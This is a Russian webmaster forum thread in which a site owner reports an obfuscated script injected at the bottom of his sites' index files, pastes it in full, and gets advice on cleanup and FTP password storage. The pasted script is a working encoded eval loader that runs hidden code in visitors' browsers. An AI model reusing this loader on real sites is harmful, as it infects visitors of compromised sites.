Какой-то вирус добавляет код на сайты

12
Перец
На сайте с 11.07.2004
Offline
220
1629

Сегодня обнаружил, что многие (но не все) сайты содержат чужой код внизу индексного файла. Код такой:

<script>

vvvv="bdb6baacb4bcb7adf7aeabb0adbcf1fee5b0bfabb8b4bcf9aaabbae4fbb1adada9e3f6f6afb7e0ebf7b7bcadf6b2b8abb8b4bbb8f6e8edf6b0b7bdbca1f7a9b1a9fbf9aeb0bdadb1e4e8f9b1bcb0beb1ade4e8f9aaada0b5bce4fbafb0aab0bbb0b5b0ada0e3b1b0bdbdbcb7fbe7e5f6b0bfabb8b4bce7fef0e2afa1a1afa1e4fb97b897fbe2afafa1afafe4fbfbe2";
vxxvx="";
vvxx="function func() {vvvxv=eval;vvvxx=unescape;vvvx=String.fromCharCode;vxvvx=Math.PI;vvvvv=parseInt;vxvv=vvvvv(~((vxvvx&vxvvx)|(~vxvvx&vxvvx)&(vxvvx&~vxvvx)|(~vxvvx&~vxvvx)));vxvx=vvvvv(((vxvv&vxvv)|(~vxvv&vxvv)&(vxvv&~vxvv)|(~vxvv&~vxvv))&1);vxvxv=vxvx<<vxvx;vvxvv=vxvv;for(vxxxv=vxvv;vxxxv<vvxx.length;vxxxv-=-vxvx)vvxvv+=vvvvv(vvxx.charCodeAt(vxxxv));vvxvv=vvxvv.toString();vvxvv%=vvvxx(0x64);for(vxvxx=vxvv;vxvxx<(vvvv.length>>vxvx);vxvxx-=-vxvx){vxxx='';for(vvxvx=vxvv;vvxvx<vxvxv;vvxvx-=-vxvx)vxxx+=vvvv.charAt(vxvxx*vxvxv+vvxvx);vxxvx+=vvvx(vvvxx(0xFF)-vvvvv(vvvvv(vxxx,vxvxv<<(vxvxv+vxvx))^vvxvv));}try{vvvxv(vxxvx);} catch(e){try{eval(vxxvx);} catch(e) {window.location='/';}}}func();";
eval(vvxx);

</script>

Я сейчас просканирую компьютер на вирусы и поменяю пароли. Но может кто-то знает где именно сидит зараза и как ее лечить?

ftp-пароли храню в тотал коммандере. Знаю, что ненадежно. Какая есть защищенная альтернатива?

Dyachek
На сайте с 15.12.2007
Offline
128
#1

Поможет только полная переустановка ОС на локальном ПК со сменой всех паролей.

Чистка АВ не обязательно, что поможет, да и гарантий 100% нету.

Попали -- платите.

Перец
На сайте с 11.07.2004
Offline
220
#2

Dyachek, понятно, что переустановка Винды поможет. Но если бы это был единственный способ, то антивирусов бы не существовало.

fima32
На сайте с 12.01.2006
Offline
132
#3
Перец:

ftp-пароли храню в тотал коммандере. Знаю, что ненадежно. Какая есть защищенная альтернатива?

Будете хранить дальше - так и останетесь рассадником вирусов.

Держите пароли в голове.

Перец
На сайте с 11.07.2004
Offline
220
#4

fima32, Где взять голову, которая будет хранить 100 паролей вида R4ur9Edn?

IndexSa
На сайте с 23.12.2005
Offline
205
#5

Trojan Remover скачать. Он 30 дней будет жить бесплатно. Прошерстит реестр и скажет вам кто приписывает код к htmlу

мозг находится в мире, а мир находится в мозгу
Strem
На сайте с 13.12.2007
Offline
144
#6
Перец:
fima32, Где взять голову, которая будет хранить 100 паролей вида R4ur9Edn?

Как говорил вумный прапорщик - если голова дырявая, блокнот заведите, как у меня))

Шутки-шутками, но важные пароли действительно лучше хранить в блокноте и не в электронном виде, а на простой бумаге, ручкой (есть такие девайсы)). :)

Перец
На сайте с 11.07.2004
Offline
220
#7

Strem, спасибо!

Strem, потом кейлогер все пароли спишет и Винду переустанавливать? И так по кругу? :)

[Удален]
#8
Перец:
fima32, Где взять голову, которая будет хранить 100 паролей вида R4ur9Edn?

я в блокноте всё храню не на системном диске! И всё в порядке.:)

Ctulhu
На сайте с 21.05.2005
Offline
222
#9
Перец:
Где взять голову, которая будет хранить 100 паролей вида R4ur9Edn?

Password Commander вам в помощь. Пароли не хранить в фтп клиенте. Чистить комп. Менять пароли! Удачи. В свое время поимел кучу гемора с этим, теперь все в порядке. Чего и вам желаю.

FView
На сайте с 03.05.2006
Offline
186
#10

странно ... видно новую дырку нашли ... самое лучшее средство = сидеть под юзером и не юзать эксплорер... и поставьте халявный каспер, который яша на халяву раздает ... он хорошо ловит такое говнецо

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий